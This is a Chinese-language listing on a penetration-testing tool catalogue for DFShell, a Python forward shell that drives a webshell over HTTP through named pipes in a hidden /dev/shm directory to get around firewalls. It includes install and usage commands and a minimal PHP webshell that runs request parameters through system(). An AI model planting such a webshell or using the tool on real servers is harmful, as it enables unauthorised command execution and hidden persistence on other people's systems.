Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
DFShell — 基于Python的前向Shell工具,通过命名管道在HTTP上创建类似TTY的交互式Shell,允许在具有防火墙的目标上执行命令而无需持久网络连接。 | Kitploit
工具/GitHubGitHub/d3ext/dfshell
Payload生成ShellcodeWeb应用程序漏洞利用渗透测试
GitHubd3ext/dfshell

DFShell

基于Python的前向Shell工具,通过命名管道在HTTP上创建类似TTY的交互式Shell,允许在具有防火墙的目标上执行命令而无需持久网络连接。

查看仓库
1221952年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
root@kitploit:~
██████╗ ███████╗███████╗██╗  ██╗███████╗██╗     ██╗     
██╔══██╗██╔════╝██╔════╝██║  ██║██╔════╝██║     ██║     
██║  ██║█████╗  ███████╗███████║█████╗  ██║     ██║     
██║  ██║██╔══╝  ╚════██║██╔══██║██╔══╝  ██║     ██║     
██████╔╝██║     ███████║██║  ██║███████╗███████╗███████╗
╚═════╝ ╚═╝     ╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝                      

介绍

D3Ext 的前向Shell 是一个python3脚本,它利用mkfifo在受害者机器上模拟一个shell。它在/dev/shm/.fs/中创建一个隐藏目录用于存储fifo。你甚至可以在webshell上模拟一个TTY。

说明

此前向Shell创建一个通过命名管道 (mkfifo) 接收命令并将结果输出到文件的shell。这样,shell不需要持久网络连接,因此你可以在阻止反向/绑定shell的防火墙后面建立合适的TTY。

  1. 在目标服务器上创建命名管道
  2. 读取并执行从命名管道接收的命令
  3. 将STDOUT和STDERR保存到输出文件
  4. 返回第2步,再次从命名管道读取

特性

  • 快速且可配置
  • 集成强大的命令
  • 交互式TTY Shell

安装

从源码安装

root@kitploit:~
git clone https://github.com/D3Ext/DFShell
cd DFShell
pip3 install -r requirements.txt

使用pip安装

root@kitploit:~
pip3 install dfshell

用法

DFShell 具有多种CLI参数,可改进前向Shell的配置。

帮助面板

root@kitploit:~
usage: dfshell.py [-h] -u URL -p PARAMETER [-t TIMEOUT] [--path PATH] [-v VERBOSE]

D3Ext's Forward Shell - Enhanced forward shell with integrated commands

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     url of the webshell (i.e. http://10.10.10.10/webshell.php)
  -p PARAMETER, --parameter PARAMETER
                        parameter of the webshell to execute commands (i.e. cmd)
  -t TIMEOUT, --timeout TIMEOUT
                        timeout of requests that execute commands (default 20s)
  --path PATH           path in which to create named pipes (default /dev/shm/.fs)
  -v VERBOSE, --verbose VERBOSE
                        print more information

它向给定的URL发送GET请求,因此webshell应该类似于:

root@kitploit:~
<?php
  if(isset($_REQUEST['cmd']))
  {
    system($_REQUEST['cmd']);
  }
?>

在Parrot OS上配合Apache服务器测试通过

如果你想在受控环境中测试此工具,这里列出了一些HackTheBox机器的列表,这些机器在Web服务器上应用了防火墙规则,因此前向Shell是直接进行权限提升的绝佳替代方案。

  • Inception




演示

参考

感谢@ippsec提供这一出色的技巧

root@kitploit:~
https://github.com/IppSec/forward-shell
https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux#forward-shell
https://www.f5.com/labs/learning-center/forward-and-reverse-shells
https://github.com/Hypnoze57/FShell
https://s4vitar.github.io/ttyoverhttp/

贡献

请参见 CONTRIBUTING.md

变更日志

请参见 CHANGELOG.md

许可证

本项目采用MIT许可证

版权所有 © 2023, D3Ext

支持

Buy Me A Coffee

下载工具